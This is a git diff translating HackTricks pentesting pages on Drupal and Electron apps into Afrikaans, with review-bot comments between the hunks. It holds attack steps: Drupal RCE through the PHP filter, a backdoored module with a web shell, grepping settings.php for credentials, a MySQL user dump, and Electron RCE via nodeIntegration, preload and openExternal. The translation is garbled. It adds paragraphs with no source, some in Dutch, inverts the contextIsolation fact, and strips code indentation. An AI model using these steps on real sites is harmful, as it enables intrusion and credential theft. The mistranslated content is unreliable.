@@ -92,113 +85,144 @@ curl https://example.com/core/core.services.yml # Download content from files exposed in the previous step curl https://example.com/config/sync/swiftmailer.transport.yml ``` +### Outomaties -### Automatic +#### Drupal +Drupal is 'n gratis en oopbron-inhoudbestuurstelsel (CMS) wat gebruik word om webwerwe te bou en te bestuur. Dit is 'n baie gewilde CMS wat deur baie webwerwe regoor die wêreld gebruik word. As 'n pentester is dit belangrik om te weet hoe om Drupal-webwerwe te toets vir moontlike kwesbaarhede. + +#### Drupal-weergawes + +Dit is belangrik om die weergawe van Drupal wat op 'n webwerf gebruik word, te bepaal, aangesien sekere weergawes kwesbaarhede kan hê wat in ander weergawes opgelos is. Dit kan gedoen word deur na spesifieke kenmerke of bestande te soek wat uniek is vir 'n spesifieke weergawe van Drupal. + +#### Drupal-kwesbaarhede + +Daar is verskeie kwesbaarhede wat in Drupal-webwerwe kan voorkom. Dit sluit in SQL-injeksie, kruissite-skripsie (XSS), toegangsbeheerprobleme en meer. Dit is belangrik om hierdie kwesbaarhede te identifiseer en te verstaan hoe om dit uit te buit. + +#### Drupal-modules + +Drupal maak gebruik van modules om funksionaliteit aan webwerwe toe te voeg. Sommige modules kan kwesbaarhede hê wat uitgebuit kan word. Dit is belangrik om die modules wat op 'n Drupal-webwerf geïnstalleer is, te identifiseer en te ondersoek vir moontlike kwesbaarhede. + +#### Drupal-temas + +Temas word gebruik om die voorkoms van 'n Drupal-webwerf te bepaal. Sommige temas kan sekuriteitskwesbaarhede hê wat uitgebuit kan word. Dit is belangrik om die temas wat op 'n Drupal-webwerf gebruik word, te identifiseer en te ondersoek vir moontlike kwesbaarhede. + +#### Drupal-bronne + +Daar is baie bronne beskikbaar wat inligting en hulpmiddels bied vir die pentesting van Drupal-webwerwe. Dit sluit in dokumentasie, gemeenskapsforums, veiligheidskennisbasisse en meer. 
Dit is belangrik om hierdie bronne te raadpleeg om 'n beter begrip van Drupal en die moontlike kwesbaarhede te verkry. + +#### Drupal-pentesting-hulpmiddels + +Daar is verskeie hulpmiddels beskikbaar wat spesifiek ontwerp is vir die pentesting van Drupal-webwerwe. Hierdie hulpmiddels kan gebruik word om kwesbaarhede te identifiseer, toetsdata te manipuleer en toegang tot die webwerf te verkry. Dit is belangrik om bekend te wees met hierdie hulpmiddels en hoe om dit effektief te gebruik. ```bash droopescan scan drupal -u http://drupal-site.local ``` - ## RCE -### With PHP Filter Module +### Met die PHP Filter Module {% hint style="warning" %} -In older versions of Drupal **(before version 8)**, it was possible to log in as an admin and **enable the `PHP filter` module**, which "Allows embedded PHP code/snippets to be evaluated." +In ouer weergawes van Drupal **(voor weergawe 8)**, was dit moontlik om as 'n admin in te teken en die `PHP filter` module te **aktiveer**, wat "Ingeslote PHP-kode/snippets toelaat om geëvalueer te word." 
{% endhint %} -You need the **plugin php to be installed** (check it accessing to _/modules/php_ and if it returns a **403** then, **exists**, if **not found**, then the **plugin php isn't installed**) +Jy benodig die **plugin php om geïnstalleer te wees** (kontroleer dit deur na _/modules/php_ te gaan en as dit 'n **403** teruggee, **bestaan dit**, as dit **nie gevind** word nie, is die **plugin php nie geïnstalleer** nie) -Go to _Modules_ -> (**Check**) _PHP Filter_ -> _Save configuration_ +Gaan na _Modules_ -> (**Kontroleer**) _PHP Filter_ -> _Stoor konfigurasie_ ![](<../../.gitbook/assets/image (247) (1).png>) -Then click on _Add content_ -> Select _Basic Page_ or _Article -_> Write _php shellcode on the body_ -> Select _PHP code_ in _Text format_ -> Select _Preview_ +Klik dan op _Voeg inhoud by_ -> Kies _Basiese bladsy_ of _Artikel_ -> Skryf _php shellcode in die liggaam_ -> Kies _PHP-kode_ in _Teks formaat_ -> Kies _Voorbeeld_ ![](<../../.gitbook/assets/image (253) (1).png>) -Finally just access the newly created node: - +Laastens, gaan net na die nuut geskepte node: ```bash curl http://drupal-site.local/node/3 ``` +### Installeer PHP Filter Module -### Install PHP Filter Module +Vanaf weergawe **8 en hoër, is die** [**PHP Filter**](https://www.drupal.org/project/php/releases/8.x-1.1) **module nie standaard geïnstalleer nie**. Om van hierdie funksionaliteit gebruik te maak, moet ons die module self **installeer**. -From version **8 onwards, the** [**PHP Filter**](https://www.drupal.org/project/php/releases/8.x-1.1) **module is not installed by default**. To leverage this functionality, we would have to **install the module ourselves**. - -1. Download the most recent version of the module from the Drupal website. - 1. wget https://ftp.drupal.org/files/projects/php-8.x-1.1.tar.gz -2. Once downloaded go to **`Administration`** > **`Reports`** > **`Available updates`**. -3. 
Click on **`Browse`**`,` select the file from the directory we downloaded it to, and then click **`Install`**. -4. Once the module is installed, we can click on **`Content`** and **create a new basic page**, similar to how we did in the Drupal 7 example. Again, be sure to **select `PHP code` from the `Text format` dropdown**. +1. Laai die mees onlangse weergawe van die module af van die Drupal-webwerf. +1. wget https://ftp.drupal.org/files/projects/php-8.x-1.1.tar.gz +2. Nadat dit afgelaai is, gaan na **`Administrasie`** > **`Verslae`** > **`Beskikbare opdaterings`**. +3. Klik op **`Deursoek`**`,` kies die lêer uit die gids waar ons dit afgelaai het, en klik dan op **`Installeer`**. +4. Nadat die module geïnstalleer is, kan ons op **`Inhoud`** klik en **'n nuwe basiese bladsy skep**, soortgelyk aan hoe ons dit in die Drupal 7-voorbeeld gedoen het. Maak weer seker om **`PHP-kode` te kies uit die `Teks formaat` keuslys**. ### Backdoored Module -A backdoored module can be created by **adding a shell to an existing module**. Modules can be found on the drupal.org website. Let's pick a module such as [CAPTCHA](https://www.drupal.org/project/captcha). Scroll down and copy the link for the tar.gz [archive](https://ftp.drupal.org/files/projects/captcha-8.x-1.2.tar.gz). - -* Download the archive and extract its contents. +'n Backdoored-module kan geskep word deur **'n skulpunt by 'n bestaande module te voeg**. Modules kan op die drupal.org-webwerf gevind word. Laat ons 'n module soos [CAPTCHA](https://www.drupal.org/project/captcha) kies. Rol af en kopieer die skakel vir die tar.gz [argief](https://ftp.drupal.org/files/projects/captcha-8.x-1.2.tar.gz). +* Laai die argief af en onttrek die inhoud daarvan. 
``` wget --no-check-certificate https://ftp.drupal.org/files/projects/captcha-8.x-1.2.tar.gz tar xvf captcha-8.x-1.2.tar.gz ``` - -* Create a **PHP web shell** with the contents: - +* Skep 'n **PHP-webdop** met die inhoud: ```php ``` - -* Next, we need to create a **`.htaccess`** file to give ourselves access to the folder. This is necessary as Drupal denies direct access to the **`/modules`** folder. - +* Volgende, moet ons 'n **`.htaccess`** lêer skep om onsself toegang tot die gids te gee. Dit is nodig omdat Drupal direkte toegang tot die **`/modules`** gids weier. ```html RewriteEngine On RewriteBase / ``` - -* The configuration above will apply rules for the / folder when we request a file in /modules. Copy both of these files to the captcha folder and create an archive. - +* Die konfigurasie hierbo sal reëls toepas vir die /-vouer wanneer ons 'n lêer in die /modules-vouer aanvra. Kopieer albei hierdie lêers na die captcha-vouer en skep 'n argief. ```bash mv shell.php .htaccess captcha tar cvf captcha.tar.gz captcha/ ``` - -* Assuming we have **administrative access** to the website, click on **`Manage`** and then **`Extend`** on the sidebar. Next, click on the **`+ Install new module`** button, and we will be taken to the install page, such as `http://drupal-site.local/admin/modules/install` Browse to the backdoored Captcha archive and click **`Install`**. -* Once the installation succeeds, browse to **`/modules/captcha/shell.php`** to execute commands. +* Veronderstel dat ons **administratiewe toegang** tot die webwerf het, klik op **`Bestuur`** en dan **`Uitbrei`** in die sybalk. Klik daarna op die **`+ Installeer nuwe module`** knoppie, en ons sal na die installasiebladsy geneem word, soos `http://drupal-site.local/admin/modules/install`. Blaai na die agterdeurde Captcha-argief en klik **`Installeer`**. +* Sodra die installasie suksesvol is, blaai na **`/modules/captcha/shell.php`** om opdragte uit te voer. 
## Post Exploitation -### Read settings.php - +### Lees settings.php ``` find / -name settings.php -exec grep "drupal_hash_salt\|'database'\|'username'\|'password'\|'host'\|'port'\|'driver'\|'prefix'" {} \; 2>/dev/null ``` +### Stort gebruikers uit DB -### Dump users from DB +Om gebruikers uit een database te dumpen, kunt u de volgende stappen volgen: +1. Identificeer de database die wordt gebruikt door de Drupal-website. Dit kan meestal worden gevonden in het configuratiebestand van Drupal (`settings.php`). + +2. Maak verbinding met de database met behulp van een databasebeheertool zoals phpMyAdmin of de opdrachtregelinterface van MySQL. + +3. Zoek de tabel die de gebruikersinformatie bevat. In Drupal is dit meestal de tabel met de naam `users`. + +4. Voer een SQL-query uit om alle gebruikersgegevens uit de tabel te selecteren. Bijvoorbeeld: + + ```sql + SELECT * FROM users; + ``` + + Deze query selecteert alle kolommen en rijen uit de `users`-tabel. + +5. Exporteer de resultaten van de query naar een bestand of bekijk ze direct in de databasebeheertool. + +Opmerking: Het dumpen van gebruikersgegevens uit een database kan illegaal zijn zonder de juiste toestemming. Zorg ervoor dat u de wettelijke en ethische richtlijnen volgt bij het uitvoeren van deze actie. ``` mysql -u drupaluser --password='2r9u8hu23t532erew' -e 'use drupal; select * from users' ``` - -## References +## Verwysings * [https://academy.hackthebox.com/module/113/section/1209](https://academy.hackthebox.com/module/113/section/1209)
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
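Review bot: the translated Drupal page gains paragraphs that have no counterpart in the English `-` lines, and some of them are not even Afrikaans: the new "#### Drupal-pentesting-hulpmiddels" paragraph before the `droopescan` block, and under "Dump users from DB" a five-step walkthrough plus an "Opmerking:" sentence written in Dutch ("Om gebruikers uit een database te dumpen, kunt u de volgende stappen volgen", "Maak verbinding met de database met behulp van een databasebeheertool"). A translation commit must be content-preserving, so drop those added `+` paragraphs and keep only the translated originals. Two smaller points in the same hunk: the nested item "1. wget https://ftp.drupal.org/files/projects/php-8.x-1.1.tar.gz" lost its indentation, so the list now shows two items numbered 1; and the backticked labels **`Administration`** > **`Reports`** > **`Available updates`**, **`Browse`**, **`Install`**, **`Manage`**, **`Extend`** and **`+ Install new module`** are literal menu names of the Drupal admin UI and should stay in English rather than become `Administrasie`, `Verslae`, `Beskikbare opdaterings`, `Bestuur`, `Uitbrei`. The blank lines that separated prose from the fenced blocks were also removed throughout, which changes how the fences render after list items.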
diff --git a/network-services-pentesting/pentesting-web/electron-desktop-apps/README.md b/network-services-pentesting/pentesting-web/electron-desktop-apps/README.md index e2dd7dceb..91d189952 100644 --- a/network-services-pentesting/pentesting-web/electron-desktop-apps/README.md +++ b/network-services-pentesting/pentesting-web/electron-desktop-apps/README.md @@ -2,46 +2,41 @@
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling van eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
-## Introduction +## Inleiding -Electron combines a local backend (with **NodeJS**) and a frontend (**Chromium**), although tt lacks some the security mechanisms of modern browsers. - -Usually you might find the electron app code inside an `.asar` application, in order to obtain the code you need to extract it: +Electron kombineer 'n plaaslike agterkant (met **NodeJS**) en 'n voorkant (**Chromium**), alhoewel dit sommige van die sekuriteitsmeganismes van moderne webblaaie mis. +Gewoonlik sal jy die elektron-toepassingskode binne 'n `.asar`-toepassing vind, om die kode te verkry moet jy dit onttrek: ```bash npx asar extract app.asar destfolder #Extract everything npx asar extract-file app.asar main.js #Extract just a file ``` - -In the source code of an Electron app, inside `packet.json`, you can find specified the `main.js` file where security configs ad set. - +In die bronkode van 'n Electron-toepassing, binne `packet.json`, kan jy die `main.js` lêer vind waar sekuriteitskonfigurasies ingestel word. ```json { - "name": "standard-notes", - "main": "./app/index.js", +"name": "standard-notes", +"main": "./app/index.js", ``` +Electron het 2 proses tipes: -Electron has 2 process types: - -* Main Process (has complete access to NodeJS) -* Renderer Process (should have NodeJS restricted access for security reasons) +* Hoofproses (het volledige toegang tot NodeJS) +* Rendererproses (moet NodeJS-toegang beperk vir veiligheidsredes) ![](<../../../.gitbook/assets/image (307) (5) (1).png>) -A **renderer process** will be a browser window loading a file: - +'n **Rendererproses** sal 'n blaaier-venster wees wat 'n lêer laai: ```javascript const {BrowserWindow} = require('electron'); let win = new BrowserWindow(); 
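Review bot: this hunk alters code it should not touch: the JSON block loses its indentation ("-  \"name\": \"standard-notes\"," becomes "+\"name\": \"standard-notes\",") and the blank lines between prose and the ```bash / ```json fences are removed, so the translation workflow is evidently reflowing fenced blocks. Exclude fenced code from translation and re-emit it byte for byte. While here, `packet.json` in "binne `packet.json`, kan jy die `main.js` lêer vind" is the pre-existing typo for `package.json`, and "elektron-toepassingskode" lowercases a product name that the rest of the patch spells "Electron"; both are worth fixing in the same pass.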
@@ -49,73 +44,66 @@ let win = new BrowserWindow(); //Open Renderer Process win.loadURL(`file://path/to/index.html`); ``` +Instellings van die **renderer proses** kan in die **hoofproses** in die main.js-lêer gekonfigureer word. Sommige van die konfigurasies sal die Electron-toepassing **verhoed om RCE** of ander kwesbaarhede te kry as die **instellings korrek gekonfigureer is**. -Settings of the **renderer process** can be **configured** in the **main process** inside the main.js file. Some of the configurations will **prevent the Electron application to get RCE** or other vulnerabilities if the **settings are correctly configured**. +Die Electron-toepassing **kan toegang tot die toestel kry** via Node-API's, alhoewel dit gekonfigureer kan word om dit te voorkom: -The electron application **could access the device** via Node apis although it can be configure to prevent it: - -* **`nodeIntegration`** - is `off` by default. If on, allows to access node features from the renderer process. -* **`contextIsolation`** - is `on` by default. If on, main and renderer processes aren't isolated. -* **`preload`** - empty by default. -* [**`sandbox`**](https://docs.w3cub.com/electron/api/sandbox-option) - is off by default. It will restrict the actions NodeJS can perform. -* Node Integration in Workers -* **`nodeIntegrationInSubframes`**- is `off` by default. - * If **`nodeIntegration`** is **enabled**, this would allow the use of **Node.js APIs** in web pages that are **loaded in iframes** within an Electron application. - * If **`nodeIntegration`** is **disabled**, then preloads will load in the iframe - -Example of configuration: +* **`nodeIntegration`** - is standaard `off`. As dit aan is, kan node-funksies van die renderer proses gebruik word. +* **`contextIsolation`** - is standaard `on`. As dit aan is, is die hoof- en renderer prosesse nie geïsoleer nie. +* **`preload`** - standaard leeg. 
+* [**`sandbox`**](https://docs.w3cub.com/electron/api/sandbox-option) - is standaard af. Dit sal die aksies wat NodeJS kan uitvoer, beperk. +* Node-integrasie in werkers +* **`nodeIntegrationInSubframes`** - is standaard `off`. +* As **`nodeIntegration`** **geaktiveer** is, sal dit die gebruik van **Node.js-API's** in webbladsye wat in iframes in 'n Electron-toepassing gelaai word, toelaat. +* As **`nodeIntegration`** **gedeaktiveer** is, sal preloads in die iframe gelaai word. +Voorbeeld van konfigurasie: ```javascript const mainWindowOptions = { - title: 'Discord', - backgroundColor: getBackgroundColor(), - width: DEFAULT_WIDTH, - height: DEFAULT_HEIGHT, - minWidth: MIN_WIDTH, - minHeight: MIN_HEIGHT, - transparent: false, - frame: false, - resizable: true, - show: isVisible, - webPreferences: { - blinkFeatures: 'EnumerateDevices,AudioOutputDevices', - nodeIntegration: false, - contextIsolation: false, - sandbox: false, - nodeIntegrationInSubFrames: false, - preload: _path2.default.join(__dirname, 'mainScreenPreload.js'), - nativeWindowOpen: true, - enableRemoteModule: false, - spellcheck: true - } +title: 'Discord', +backgroundColor: getBackgroundColor(), +width: DEFAULT_WIDTH, +height: DEFAULT_HEIGHT, +minWidth: MIN_WIDTH, +minHeight: MIN_HEIGHT, +transparent: false, +frame: false, +resizable: true, +show: isVisible, +webPreferences: { +blinkFeatures: 'EnumerateDevices,AudioOutputDevices', +nodeIntegration: false, +contextIsolation: false, +sandbox: false, +nodeIntegrationInSubFrames: false, +preload: _path2.default.join(__dirname, 'mainScreenPreload.js'), +nativeWindowOpen: true, +enableRemoteModule: false, +spellcheck: true +} }; ``` - -Some **RCE payloads** from [here](https://7as.es/electron/nodeIntegration\_rce.txt): - +Sommige **RCE payloads** van [hier](https://7as.es/electron/nodeIntegration\_rce.txt): ```html Example Payloads (Windows): - + Example Payloads (Linux & MacOS): - - + + - + ``` +### Vang verkeer -### Capture traffic - -Modify the 
start-main configuration and add the use of a proxy such as: - +Wysig die start-main konfigurasie en voeg die gebruik van 'n proksi by soos: ```javascript "start-main": "electron ./dist/main/main.js --proxy-server=127.0.0.1:8080 --ignore-certificateerrors", ``` +## Electron Plaaslike Kode-inspuiting -## Electron Local Code Injection - -If you can execute locally an Electron App it's possible that you could make it execute arbitrary javascript code. Check how in: +As jy plaaslik 'n Electron-toepassing kan uitvoer, is dit moontlik dat jy dit kan laat uitvoer om arbitrêre JavaScript-kode uit te voer. Kyk hoe in: {% content-ref url="../../../macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-electron-applications-injection.md" %} [macos-electron-applications-injection.md](../../../macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-electron-applications-injection.md) @@ -123,69 +111,63 @@ If you can execute locally an Electron App it's possible that you could make it ## RCE: XSS + nodeIntegration -If the **nodeIntegration** is set to **on**, a web page's JavaScript can use Node.js features easily just by calling the `require()`. For example, the way to execute the calc application on Windows is: - +As die **nodeIntegration** op **aan** ingestel is, kan 'n webblad se JavaScript Node.js-funksies maklik gebruik deur eenvoudig die `require()` te roep. Byvoorbeeld, die manier om die rekenaarprogram op Windows uit te voer is: ```html ``` -
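Review bot: in the previous hunk (@@ -49,73 +44,66 @@) the `contextIsolation` bullet carries an inverted statement from the source: "is standaard `on`. As dit aan is, is die hoof- en renderer prosesse nie geïsoleer nie" contradicts the page's own later text ("As `contextIsolation` aan is, sal dit nie werk nie", and the section stating that contextIsolation introduces separated contexts). It should read that the processes are not isolated when the setting is off; since the English `-` line has the same inversion, fix it upstream and here. Also the two sub-bullets under `nodeIntegrationInSubframes` lost their indentation and now render as top-level bullets, and the `mainWindowOptions` JavaScript block lost all of its indentation ("-  title: 'Discord'," becomes "+title: 'Discord',"). The flag in the start-main line, `--ignore-certificateerrors`, is pre-existing but should be `--ignore-certificate-errors`.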
## RCE: preload -The script indicated in this setting is l**oaded before other scripts in the renderer**, so it has **unlimited access to Node APIs**: - +Die skrip wat in hierdie instelling aangedui word, word **gelaai voordat ander skripte in die renderer**, so dit het **onbeperkte toegang tot Node APIs**: ```javascript new BrowserWindow{ - webPreferences: { - nodeIntegration: false, - preload: _path2.default.join(__dirname, 'perload.js'), - } +webPreferences: { +nodeIntegration: false, +preload: _path2.default.join(__dirname, 'perload.js'), +} }); ``` - -Therefore, the script can export node-features to pages: +Daarom kan die skrip node-kenmerke na bladsye uitvoer: {% code title="preload.js" %} ```javascript typeof require === 'function'; window.runCalc = function(){ - require('child_process').exec('calc') +require('child_process').exec('calc') }; ``` -{% endcode %} - {% code title="index.html" %} ```html - + ``` {% endcode %} {% hint style="info" %} -**If `contextIsolation` is on, this won't work** +**As `contextIsolation` aan is, sal dit nie werk nie** {% endhint %} ## RCE: XSS + contextIsolation -The _**contextIsolation**_ introduces the **separated contexts between the web page scripts and the JavaScript Electron's internal code** so that the JavaScript execution of each code does not affect each. This is a necessary feature to eliminate the possibility of RCE. +Die _**contextIsolation**_ stel die **geskeide kontekste tussen die webbladsy-skripte en die JavaScript Electron se interne kode** in sodat die JavaScript-uitvoering van elke kode nie mekaar beïnvloed nie. Dit is 'n noodsaaklike kenmerk om die moontlikheid van RCE uit te skakel. -If the contexts aren't isolated an attacker can: +As die kontekste nie geïsoleer is nie, kan 'n aanvaller die volgende doen: -1. Execute **arbitrary JavaScript in renderer** (XSS or navigation to external sites) -2. **Overwrite the built-in method** which is used in preload or Electron internal code to own function -3. 
**Trigger** the use of **overwritten function** +1. Voer **arbitrêre JavaScript in renderer** uit (XSS of navigasie na eksterne webwerwe) +2. **Oorskryf die ingeboude metode** wat gebruik word in preload of Electron se interne kode met eie funksie +3. **Trigger** die gebruik van die **oorgeskryfde funksie** 4. RCE? -There are 2 places where built-int methods can be overwritten: In preload code or in Electron internal code: +Daar is 2 plekke waar ingeboude metodes oorgeskrewe kan word: In preload-kode of in Electron se interne kode: {% content-ref url="electron-contextisolation-rce-via-preload-code.md" %} [electron-contextisolation-rce-via-preload-code.md](electron-contextisolation-rce-via-preload-code.md) 
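Review bot: the hunk deletes the `{% endcode %}` that closes `{% code title="preload.js" %}` ("-{% endcode %}" has no `+` counterpart before "{% code title="index.html" %}"), which leaves an unclosed GitBook code template and will break rendering from that point on; restore that line. The `new BrowserWindow{` snippet and the `'perload.js'` filename are pre-existing defects (the call should be `new BrowserWindow({ ... })` and the file `preload.js`), and the translated sentence "is dit moontlik dat jy dit kan laat uitvoer om arbitrêre JavaScript-kode uit te voer" repeats "uitvoer"; "dat jy dit arbitrêre JavaScript-kode kan laat uitvoer" reads cleanly.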
@@ -199,40 +181,35 @@ There are 2 places where built-int methods can be overwritten: In preload code o [electron-contextisolation-rce-via-ipc.md](electron-contextisolation-rce-via-ipc.md) {% endcontent-ref %} -### Bypass click event - -If there are restrictions applied when you click a link you might be able to bypass them **doing a middle click** instead of a regular left click +### Bypass kliekgebeurtenis +As daar beperkings geld wanneer jy op 'n skakel klik, kan jy dit moontlik omseil deur **'n middelste kliek** te doen in plaas van 'n gewone linker kliek. ```javascript -window.addEventListener('click', (e) => { +window.addEventListener('click', (e) => { ``` - ## RCE via shell.openExternal -For more info about this examples check [https://shabarkin.medium.com/1-click-rce-in-electron-applications-79b52e1fe8b8](https://shabarkin.medium.com/1-click-rce-in-electron-applications-79b52e1fe8b8) and [https://benjamin-altpeter.de/shell-openexternal-dangers/](https://benjamin-altpeter.de/shell-openexternal-dangers/) +Vir meer inligting oor hierdie voorbeelde, besoek [https://shabarkin.medium.com/1-click-rce-in-electron-applications-79b52e1fe8b8](https://shabarkin.medium.com/1-click-rce-in-electron-applications-79b52e1fe8b8) en [https://benjamin-altpeter.de/shell-openexternal-dangers/](https://benjamin-altpeter.de/shell-openexternal-dangers/) -hen deploying an Electron desktop application, ensuring the correct settings for `nodeIntegration` and `contextIsolation` is crucial. It's established that **client-side remote code execution (RCE)** targeting preload scripts or Electron's native code from the main process is effectively prevented with these settings in place. 
- -Upon a user interacting with links or opening new windows, specific event listeners are triggered, which are crucial for the application's security and functionality: +By die implementering van 'n Electron-desktoptoepassing, is dit noodsaaklik om die korrekte instellings vir `nodeIntegration` en `contextIsolation` te verseker. Dit is vasgestel dat **kliëntkant-afstandskode-uitvoering (RCE)** wat mik op voorlaai-skripte of Electron se inheemse kode vanaf die hoofproses, effektief voorkom word met hierdie instellings. +Wanneer 'n gebruiker skakels gebruik of nuwe vensters oopmaak, word spesifieke gebeurtenisluisteraars geaktiveer, wat krities is vir die toepassing se veiligheid en funksionaliteit: ```javascript webContents.on("new-window", function (event, url, disposition, options) {} webContents.on("will-navigate", function (event, url) {} ``` +Hierdie luisteraars word **oorheers deur die lessenaartoepassing** om sy eie **sakelogika** te implementeer. Die toepassing evalueer of 'n genavigeerde skakel intern of in 'n eksterne webblaaier geopen moet word. Hierdie besluit word tipies deur 'n funksie, `openInternally`, geneem. As hierdie funksie `false` teruggee, dui dit daarop dat die skakel ekstern geopen moet word deur die `shell.openExternal`-funksie te gebruik. -These listeners are **overridden by the desktop application** to implement its own **business logic**. The application evaluates whether a navigated link should be opened internally or in an external web browser. This decision is typically made through a function, `openInternally`. If this function returns `false`, it indicates that the link should be opened externally, utilizing the `shell.openExternal` function. 
- -**Here is a simplified pseudocode:** +**Hier is 'n vereenvoudigde pseudokode:** ![https://miro.medium.com/max/1400/1*iqX26DMEr9RF7nMC1ANMAA.png](<../../../.gitbook/assets/image (638) (2) (1) (1).png>) ![https://miro.medium.com/max/1400/1*ZfgVwT3X1V_UfjcKaAccag.png](<../../../.gitbook/assets/image (620).png>) -Electron JS security best practices advise against accepting untrusted content with the `openExternal` function, as it could lead to RCE through various protocols. Operating systems support different protocols that might trigger RCE. For detailed examples and further explanation on this topic, one can refer to [this resource](https://positive.security/blog/url-open-rce#windows-10-19042), which includes Windows protocol examples capable of exploiting this vulnerability. - -**Examples of Windows protocol exploits include:** +Elektron JS-sekuriteitsbestuurspraktyke raai teen die aanvaarding van onbetroubare inhoud met die `openExternal`-funksie, aangesien dit tot RCE deur verskeie protokolle kan lei. Bedryfstelsels ondersteun verskillende protokolle wat RCE kan veroorsaak. Vir gedetailleerde voorbeelde en verdere verduideliking oor hierdie onderwerp, kan verwys word na [hierdie bron](https://positive.security/blog/url-open-rce#windows-10-19042), wat Windows-protokole voorbeelde bevat wat hierdie kwesbaarheid kan uitbuit. 
+**Voorbeelde van Windows-protokoolaanvalle sluit in:** ```html ``` +## Lees Interne Lêers: XSS + contextIsolation -## Reading Internal Files: XSS + contextIsolation - -**Disabling `contextIsolation` enables the use of `` tags**, similar to ` ``` +## **RCE: XSS + Oue Chromium** -## **RCE: XSS + Old Chromium** +As die **chromium** wat deur die toepassing gebruik word, **oud** is en daar **bekende kwesbaarhede** daarop is, is dit moontlik om dit te **uitbuit en RCE te verkry deur middel van 'n XSS**.\ +Jy kan 'n voorbeeld sien in hierdie **verslag**: [https://blog.electrovolt.io/posts/discord-rce/](https://blog.electrovolt.io/posts/discord-rce/) -If the **chromium** used by the application is **old** and there are **known** **vulnerabilities** on it, it might be possible to to **exploit it and obtain RCE through a XSS**.\ -You can see an example in this **writeup**: [https://blog.electrovolt.io/posts/discord-rce/](https://blog.electrovolt.io/posts/discord-rce/) +## **XSS Phishing via Interne URL regex omseil** -## **XSS Phishing via Internal URL regex bypass** - -Supposing you found a XSS but you **cannot trigger RCE or steal internal files** you could try to use it to **steal credentials via phishing**. - -First of all you need to know what happen when you try to open a new URL, checking the JS code in the front-end: +As jy 'n XSS gevind het, maar jy **kan nie RCE veroorsaak of interne lêers steel nie**, kan jy probeer dit gebruik om geloofsbriewe te steel deur middel van 'n phising-aanval. 
+Eerstens moet jy weet wat gebeur wanneer jy probeer om 'n nuwe URL oop te maak, deur die JS-kode in die voorkant te ondersoek: ```javascript webContents.on("new-window", function (event, url, disposition, options) {} // opens the custom openInternally function (it is declared below) webContents.on("will-navigate", function (event, url) {} // opens the custom openInternally function (it is declared below) ``` +Die oproep na **`openInternally`** sal besluit of die **skakel** in die **desktop-venster** geopen sal word, aangesien dit 'n skakel is wat aan die platform behoort, **of** of dit in die **blaaier as 'n derde party bron** geopen sal word. -The call to **`openInternally`** will decide if the **link** will be **opened** in the **desktop window** as it's a link belonging to the platform, **or** if will be opened in the **browser as a 3rd party resource**. - -In the case the **regex** used by the function is **vulnerable to bypasses** (for example by **not escaping the dots of subdomains**) an attacker could abuse the XSS to **open a new window which** will be located in the attackers infrastructure **asking for credentials** to the user: - +In die geval dat die **regex** wat deur die funksie gebruik word, **kwesbaar is vir omseilings** (byvoorbeeld deur **nie die punte van subdomeine te ontsnap nie**), kan 'n aanvaller die XSS 